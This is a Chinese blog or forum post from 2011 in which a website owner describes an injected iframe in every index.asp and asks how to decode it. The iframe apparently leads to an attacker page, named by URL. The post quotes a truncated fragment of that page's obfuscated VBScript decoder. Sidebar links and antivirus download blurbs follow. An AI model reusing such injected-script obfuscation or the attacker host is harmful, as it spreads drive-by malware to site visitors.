Trojan.DL.VBS.Agent.r 脚本病毒 ASP解密
2011年04月18日
Trojan.DL.VBS.Agent.r 脚本病毒
问题:1.Trojan.DL.VBS.Agent.r 的情况
2.ASP解密 怎么用?
描述:
打开我的网站时,瑞星显示有这种病毒Trojan.DL.VBS.Agent.r
病毒位置:C:\Documents and Settings\Administrator.MS-E496B8708F13\Local Settings\Temporary Internet Files\Content.IE5
\ALNSDGZI xx[1].htm
下载整个网站,用最新瑞星查不出来。
后在网站的所有的index.asp(包括子目录)中都发现:代码中最后位置加了这么句代码:
打开这个页只有个 统计。又iframe了。
最后找到这个页:http://wydos.3322.org/kehu.htm
代码如下:(加密的)
hu="琳 >tpircs/""tpircSBV""=egaugnal tpircs "琳" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(hu))
下载WEBfree_web.exe 解密却不能运行。没有装VB。装个VB运行库还是少文件:richtx32.ocx
网上baidu了下,没有找到。
有高人在的请指点!小弟先谢了。
发表评论
-
Android GSM驱动模块详细分析
2012-01-20 10:24 677Android GSM驱动模块详细分析 2011年04月15 ... -
java与flex通信
2012-01-20 10:24 449java与flex通信 2010年10月22日 一、准备 ... -
windows 程序设计之「NetTime.C」范例分析笔记
2012-01-20 10:23 629windows 程序设计之「NetTime.C」范例分析笔记 ... -
[How Tomcat Works]第4章 Tomcat默认连接器
2012-01-20 10:23 574[How Tomcat Works]第4章 Tomca ... -
linux服务器编程--EPOLL
2012-01-20 10:23 507linux服务器编程--EPOLL 20 ... -
转 Windows API 函数在VFP中的运用
2012-01-19 15:25 739转 Windows API 函数在VFP中的运用 2010年 ... -
VB-2.1
2012-01-19 15:25 558VB-2.1 2011年09月26日 Option E ... -
VB窗口图表化
2012-01-19 15:24 550VB窗口图表化 2011年04月20日 '本模块为实现托 ... -
VB 两小时
2012-01-19 15:24 559VB 两小时 2011年09月25日 Option Ex ... -
使用 Shell 属性及方法
2012-01-19 15:24 523使用 Shell 属性及方法 2 ... -
celecmd 宇宙杰出青年
2012-01-17 05:11 718celecmd 宇宙杰出青年 2010年07月28日 C ... -
v b
2012-01-17 05:11 738v b 2010年11月01日 vb ... -
java进程使用的最大内存的数值
2012-01-17 05:11 631java进程使用的最大内存的数值 2011年02月16日 ... -
如何用c语言写windows服务程序
2012-01-17 05:11 647如何用c语言写windows服 ... -
列出所有的WMI对象方法和属性vbs脚本
2012-01-16 04:02 769列出所有的WMI对象方法和属性vbs脚本 2009年10月2 ... -
数学二分法解方程vbs脚本――超简单的
2012-01-16 04:02 1021数学二分法解方程vbs脚本――超简单的 2009年10月31 ... -
VBS脚本
2012-01-16 04:02 520VBS脚本 2011年06月30日 我用VBS写的往EX ... -
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
2012-01-16 04:02 747xp、2003开3389+非net创建管理用户+Shift后门 ...
相关推荐
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe。针对1KB病毒
俄罗斯安全软件Dr.Web,Trojan. Plastix木马感染文件解除工具plstfix
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
RakhniDecryptor,即卡巴斯基Rakhni勒索病毒解密工具,可以解密Rakhni在内的15种勒索病毒软件,其中还包括一款安卓勒索软件"Trojan-Ransom.AndroidOS.Pletor",如果你的电脑或安卓手机感染了勒索病毒,可以使用该...
俄罗斯安全软件大蜘蛛Dr.Web,木马解锁工具.
敲诈者木马程序以敲诈勒索钱财为目的,使得感染该木马的计算机用户系统中的指定数据文件被恶意隐藏,造成用户数据丢失。截至目前为止,在国内已经出现了因感染该木马程序而导致计算机系统数据文件丢失的情况。...
我的电脑让学生插了一下U盘,结果电脑出现中毒现象(变慢、经常蓝屏、出错、自动重启),一查是染上了 假冒腾迅TXPLATFORM.EXE 的U盘病毒,属于 Trojan.Generic.Is.536802,此文介绍查杀方法
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
js.scob.trojan
2020年trojan最新windows64客户端
通过对 “冰河”、 “蓝色火焰”、 “BO”、 “广外女生”、 “黑洞”、 “网结”病毒(Worm.Plexus.b)、 “将死者”病毒(Worm.Gone.38912)、 “恶鹰”病毒(Worm.Beagle)、 “网络天空”病毒(Worm.NetSky)、传奇叛逆...
NULL 博文链接:https://polygoncell.iteye.com/blog/733264
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
RannohDecryptor是卡巴斯基推出的一个Rannoh勒索病毒解密工具,可以解密Rannoh在内的7款勒索软件加密的文件,包括Polyglot、Rannoh、AutoIt、Fury、Crybola、Cryakl以及CryptXXX,您的电脑感染了勒索病毒,重要文件...
Trojan is a stable and efficient mobile lightweight log SDK that not only records general logs, such as Http, power changes, component life cycles, but also records the definition of the log, which it...
新增106个新U盘类病毒的查杀,其中包括autorun.vbs system.exe Trojan.Win32.GameOlx.ir;BoyFine Worm-Script.VBS.Autorun.bc;nar.vbs Worm.Script.VBS.7474;.MS32DLL.dll.exe..VBs Worm.Script.VBS.Autorun.a;...
IDA脚本解密Zbot示例中的加密字符串 Zelix Klassmaster字符串解密器 Gen4字符串解密器Backdoor.Miniduke!gen4 Trojan.Netweird记录的密钥解密器 分析感染Trojan.Ransomlock.AP(Trojan.Ransomlk.AP!inf)的Advapi...
可查杀最新木马,主要用于查杀Trojan.Malscript!html等易中木马